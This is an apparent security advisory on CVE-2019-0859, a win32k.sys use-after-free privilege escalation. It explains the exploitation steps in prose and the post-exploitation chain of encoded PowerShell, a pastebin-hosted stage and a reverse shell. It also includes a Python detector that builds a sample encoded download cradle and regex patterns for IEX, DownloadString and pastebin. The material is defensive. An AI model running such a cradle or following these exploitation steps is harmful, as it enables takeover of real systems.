While we all breathed a sigh of relief after patching our systems against the two zero-days reported in the April Patch Tuesday, news broke that one of them was being actively exploited in the wild and could allow an attacker to completely compromise a system. This is another case of win32k.sys in jeopardy.
This vulnerability, assigned CVE-2019-0859, was reported by Vasiliy Berdnikov and Boris Larin of Kaspersky Lab. It is an elevation of privilege vulnerability caused by improper handling of objects in memory by the Win32k component. Successful exploitation allows an attacker to run arbitrary code in kernel mode, which could then be used to view, change, or delete data, install programs, or create new accounts with full user rights. Consequently, backdoors that connect back to the attackers can be established on vulnerable systems.
Researchers believe that this vulnerability is a new addition to the campaigns carried out by APT groups such as SandCat and FruityArmor.
In order to exploit this vulnerability, an attacker would first have to be logged on to the system, and can then gain elevated privileges step by step. Two points help in understanding this use-after-free vulnerability:
- Function ID: Windows in the win32k.sys kernel have a tagWND structure with a Function ID field called 'fnid'. The class of a window, such as ScrollBar, Menu, Desktop, etc., is defined using this field.
- Creation of windows: Execution of the CreateWindowEx function sends a WM_NCCREATE message prior to the WM_CREATE message when a window is created. A custom callback can be set using SetWindowsHookEx to handle the WM_NCCREATE message before the window procedure is called.
An attacker gains control of a freed memory block in the following way. The Function ID of a window is 0 during the WM_NCCREATE callback, which allows an attacker to set extra data for the window; the address of the window procedure can also be changed. The window procedure is next changed to the menu window procedure, which executes xxxMenuWindowProc and sets the Function ID to FNID_MENU. But the extra data can be manipulated before the Function ID is set, which forces xxxMenuWindowProc to stop initializing the menu and return FALSE. At this point, sending the NCCREATE message is treated as a failure and CreateWindowEx stops execution with a call to FreeWindow. As a result, the window's memory block is freed and an attacker can gain control over it.
An attacker who can now execute arbitrary code in kernel mode runs a malicious file using the PowerShell framework with a Base64-encoded command. Execution of the command leads to the download of a second-stage script from https://pastebin.com. This script in turn executes the third-stage PowerShell script. Finally, a trivial HTTP reverse shell is created to gain full control of the system.
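To show where a defender can catch the post-exploitation chain described above, here is an added example (not code from the original post or from the researchers) that decodes the Base64 payload of a PowerShell -EncodedCommand from constructed process-creation command lines and flags a download cradle that fetches a stage from pastebin.com. The command lines, the PLACEHOLDER paste path and the set of switch spellings handled are assumptions.

```python
import base64
import re

# Constructed sample process-creation command lines (assumptions, not indicators
# from the page); the Base64 payload is generated by this example itself.
def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString("
                        "'https://pastebin.com/raw/PLACEHOLDER')"),
    "powershell.exe -Command Get-Process",
    "notepad.exe C:\\Users\\user\\notes.txt",
]

# Common spellings of the -EncodedCommand switch (a subset; PowerShell accepts
# any unambiguous prefix), followed by a Base64 token.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles and the staging host named in the write-up.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)
PASTE_HOST = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess(cmdline: str) -> dict:
    """Flag encoded PowerShell that carries a download cradle reaching pastebin.com."""
    decoded = decode_encoded_command(cmdline)
    flags = []
    if decoded is not None:
        flags.append("encoded-command")
        if CRADLE.search(decoded):
            flags.append("download-cradle")
        if PASTE_HOST.search(decoded):
            flags.append("pastebin-stage")
    return {"decoded": decoded, "flags": flags, "suspicious": len(flags) == 3}

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = assess(line)
        print(result["suspicious"], result["flags"], line[:40])
```

The same decode step applies to Sysmon Event ID 1 or Security 4688 command lines; a hit on all three flags is the stage-two download this write-up describes, while an encoded command alone is only a weak signal.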
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
CVE-2019-0859 is an elevation of privilege vulnerability that allows an attacker to run arbitrary code in kernel mode, which permits the attacker to take control of the entire system.
Please refer to this KB article.